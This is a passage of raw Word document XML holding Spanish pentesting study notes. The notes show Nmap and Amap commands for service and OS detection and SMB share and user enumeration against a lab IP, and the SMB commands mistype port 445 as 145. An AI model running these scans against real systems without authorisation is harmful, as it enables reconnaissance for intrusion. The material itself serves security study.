          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00D27E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reason -s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00D27E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -oX puerto.xml --stylesheet="https://svn.nmap.org/nmap/docs/nmap.xsl" (ip/rango/ip red)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617AB796" w14:textId="241E0745" w:rsidR="00383F39" w:rsidRDefault="00383F39" w:rsidP="00B10CD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F09B038" w14:textId="51EEFFDB" w:rsidR="00F0166E" w:rsidRPr="00F0166E" w:rsidRDefault="00F0166E" w:rsidP="00B10CD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F0166E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Descubrir servicios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DA4AF3" w14:textId="339E7C5A" w:rsidR="00F0166E" w:rsidRDefault="00F0166E" w:rsidP="00B10CD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo nmap -sV (ip host) [-p 21]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200C3C12" w14:textId="4F4687DE" w:rsidR="00F0166E" w:rsidRDefault="00F0166E" w:rsidP="00B10CD3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Nos devuelve qué programa realmente está usando el puerto abierto. Por ejemplo, no solo nos dice que es un FTP porque es puerto 21, sino que nos dice la versión de Proftpd que estemos usando. Incluso nos dice el S.O. que corre la máquina. Todo esto lo hace por el banner que usan los programas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD72E48" w14:textId="73EE9C1F" w:rsidR="00F0166E" w:rsidRDefault="00F0166E" w:rsidP="00B10CD3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Finalmente, un análisis detallado aún mejor sería:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDB3E66" w14:textId="6A541B6C" w:rsidR="00F0166E" w:rsidRDefault="00F0166E" w:rsidP="00F0166E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap -v </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00D27E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reason -s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="00D27E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -oX puerto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>syservicios</w:t>
      </w:r>
      <w:r w:rsidRPr="00D27E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.xml --stylesheet="https://svn.nmap.org/nmap/docs/nmap.xsl" (ip/rango/ip red)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ACE184" w14:textId="7E545247" w:rsidR="00F0166E" w:rsidRDefault="00F0166E" w:rsidP="00F0166E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F59142E" w14:textId="5EDED1E5" w:rsidR="00F0166E" w:rsidRDefault="0059384F" w:rsidP="0059384F">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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Pr>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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CONTRASTAR CON </w:t>
      </w:r>
      <w:r w:rsidR="00F0166E" w:rsidRPr="00F0166E">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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AMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E00FDC1" w14:textId="1924DEBD" w:rsidR="00F0166E" w:rsidRDefault="0059384F" w:rsidP="0059384F">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Amap no viene por defecto instalada en Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3681ACD0" w14:textId="25536FFE" w:rsidR="0059384F" w:rsidRPr="0059384F" w:rsidRDefault="0059384F" w:rsidP="0059384F">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059384F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo apt-get install amap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9485BE" w14:textId="1E0EAD63" w:rsidR="0059384F" w:rsidRPr="0059384F" w:rsidRDefault="0059384F" w:rsidP="0059384F">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0059384F">
        <w:t>Primero generamos un documento con Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E838E4" w14:textId="4BDFECEB" w:rsidR="00F0166E" w:rsidRDefault="0059384F" w:rsidP="0059384F">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059384F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap -v --reason -sS -oA servicios.amap  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(ip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6890C2CB" w14:textId="3BDC61CD" w:rsidR="0059384F" w:rsidRPr="0059384F" w:rsidRDefault="0059384F" w:rsidP="0059384F">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0059384F">
        <w:t>Nos genera dos ficheros, usaremos el que acaba en gnmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A0C8B9" w14:textId="545B8629" w:rsidR="0059384F" w:rsidRPr="0059384F" w:rsidRDefault="0059384F" w:rsidP="0059384F">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0059384F">
        <w:t>Finalmente ejecutamos amap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B73ACC" w14:textId="5833403D" w:rsidR="0059384F" w:rsidRDefault="0059384F" w:rsidP="002B7B7E">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059384F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo amap -i servicios.amap.gnmap -B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605D3A71" w14:textId="308F2D2C" w:rsidR="00BF00EA" w:rsidRDefault="00BF00EA" w:rsidP="00BF00EA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F0166E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Descubrir </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sistema Operativo</w:t>
      </w:r>
      <w:r w:rsidRPr="00F0166E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC4B1A5" w14:textId="0253D672" w:rsidR="00BF00EA" w:rsidRPr="00BF00EA" w:rsidRDefault="00BF00EA" w:rsidP="00BF00EA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF00EA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo nmap -v -O (ip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD1D4AD" w14:textId="18151BC8" w:rsidR="002B7B7E" w:rsidRPr="002B7B7E" w:rsidRDefault="002B7B7E" w:rsidP="00BF00EA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B7B7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SMB en Nmap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD77B0E" w14:textId="1FFEFC2F" w:rsidR="002B7B7E" w:rsidRPr="002B7B7E" w:rsidRDefault="002B7B7E" w:rsidP="00BF00EA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B7B7E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SMB ha tenido y tiene muchos problemas de seguridad, por ello escanearlo siempre es buena idea. Para comprobar si tiene alguna máquina, escaneamos por los puertos 139 y 445</w:t>
      </w:r>
      <w:r w:rsidR="00CB6567">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA84E18" w14:textId="5612D62C" w:rsidR="002B7B7E" w:rsidRDefault="002B7B7E" w:rsidP="00BF00EA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo nmap -v -sS -p 139,145 (ip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAF4A33" w14:textId="66FF7611" w:rsidR="002B7B7E" w:rsidRDefault="002B7B7E" w:rsidP="00BF00EA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Podemos hacer uso de los scripts que ya vienen creados en Nmap para recopilar recursos, se encuentran en </w:t>
      </w:r>
      <w:r w:rsidRPr="002B7B7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/usr/share/nmap/scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71615565" w14:textId="69117282" w:rsidR="002B7B7E" w:rsidRDefault="002B7B7E" w:rsidP="00BF00EA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Podríamos listar con </w:t>
      </w:r>
      <w:r w:rsidRPr="002B7B7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ls smb*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>y encontrar scripts que coincidan con SMB, para lanzar alguno usamos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343AC5AD" w14:textId="4584114D" w:rsidR="002B7B7E" w:rsidRDefault="002B7B7E" w:rsidP="002B7B7E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo nmap -v -sS -p 139,145 --script=smb-os-discovery (ejemplo de script)  (ip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769885A5" w14:textId="66066FE1" w:rsidR="002B7B7E" w:rsidRDefault="002B7B7E" w:rsidP="002B7B7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B7B7E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">En concreto este script devuelve con </w:t>
      </w:r>
      <w:r w:rsidR="00CB6567">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mucha precisión</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7B7E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> el sistema operativo</w:t>
      </w:r>
      <w:r w:rsidR="00CB6567">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la víctima.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9874F1" w14:textId="31A84741" w:rsidR="002B7B7E" w:rsidRDefault="002B7B7E" w:rsidP="002B7B7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Hay muchos script, como enumerar usuarios, grupos, etc…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC257E4" w14:textId="47D26691" w:rsidR="00C85AEF" w:rsidRDefault="00C85AEF" w:rsidP="00C85AEF">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>EJEMPLOS VISUALES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C522304" w14:textId="3336465F" w:rsidR="00C85AEF" w:rsidRPr="00C85AEF" w:rsidRDefault="00C85AEF" w:rsidP="00C85AEF">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo nmap -v -sS -p 139,145 --script=smb-enum-shares  192.168.52.132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC4FA73" w14:textId="0E27D577" w:rsidR="002B7B7E" w:rsidRPr="002B7B7E" w:rsidRDefault="00C85AEF" w:rsidP="00C85AEF">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C85AEF">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CABB56F" wp14:editId="47D42BFC">
            <wp:extent cx="5400040" cy="169481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00040" cy="1694815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D62E055" w14:textId="2E2B0A05" w:rsidR="002B7B7E" w:rsidRDefault="00C85AEF" w:rsidP="00C85AEF">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>El resultado es que tenemos 3 carpetas compartidas, ADMIN, C y IPC. Eso sí, no ha conseguido acceso a ellas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442C2660" w14:textId="2C8BD651" w:rsidR="00C85AEF" w:rsidRDefault="00C85AEF" w:rsidP="00C85AEF">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sin embargo, quizás al probar los usuarios con:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7F22ED" w14:textId="5BE8AC95" w:rsidR="00C85AEF" w:rsidRDefault="00C85AEF" w:rsidP="00C85AEF">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo nmap -v -sS -p 139,145 --script=smb-enum-users  192.168.52.132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0831AACC" w14:textId="35635C00" w:rsidR="00C85AEF" w:rsidRDefault="00C85AEF" w:rsidP="00C85AEF">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C85AEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="472314E7" wp14:editId="27E5C92C">
            <wp:extent cx="3657917" cy="1470787"/>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57917" cy="1470787"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCD3CA0" w14:textId="44C80F2F" w:rsidR="00C85AEF" w:rsidRPr="00C85AEF" w:rsidRDefault="00C85AEF" w:rsidP="00C85AEF">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C85AEF">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Vemos que devuelve los puertos pero el script falla.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA9A850" w14:textId="6DB59566" w:rsidR="00C85AEF" w:rsidRDefault="00C85AEF" w:rsidP="00BF00EA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A316A41" w14:textId="2934EF8D" w:rsidR="00C85AEF" w:rsidRDefault="00C85AEF" w:rsidP="00BF00EA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C85AEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SNMP en Nmap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED6CC56" w14:textId="1F201F78" w:rsidR="00C85AEF" w:rsidRDefault="00233F4B" w:rsidP="00C85AEF">
      <w:r>
        <w:t>SNMP es un protocolo que nos sirve para gestionar el dispositivo de red como un router, un switch o servidores como Windows Server por el puerto 161</w:t>
      </w:r>
      <w:r w:rsidR="00BB3B47">
        <w:t xml:space="preserve"> en UDP</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BB3B47">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6404F4" w14:textId="6DEF6E37" w:rsidR="00BB3B47" w:rsidRPr="00BB3B47" w:rsidRDefault="00BB3B47" w:rsidP="00C85AEF">
      <w:pPr>
        <w:rPr>
          <w:b/>
